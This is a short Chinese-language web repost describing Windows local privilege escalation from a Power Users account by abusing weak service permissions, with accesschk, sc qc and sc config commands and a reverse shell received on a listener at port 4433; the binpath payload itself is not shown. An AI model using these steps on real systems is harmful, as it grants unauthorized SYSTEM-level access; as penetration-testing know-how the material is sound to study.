Windows低权限提权

发布日期:2019-08-27 浏览次数: 3815 次

用户test隶属于Power User组,  登入系统,IP为192.168.60.23,监听服务IP地址为192.168.60.19
用到的工具:工具:accesschk

执行accesschk.exe -uwcqv "Power Users" * 获取可以操作的服务名称信息;  sc qc kdc查询kdc服务详细信息

查看系统启动的服务

修改参数binpath的值

执行sc config DcomLaunch obj= ".\LocalSystem" password= ""在重新启动DcomLaunch,在192.168.60.19监听的4433端口成功获取反弹,系统权限

 

转自:黑白之道

分享到:
×

微信扫一扫分享

XML 地图 | Sitemap 地图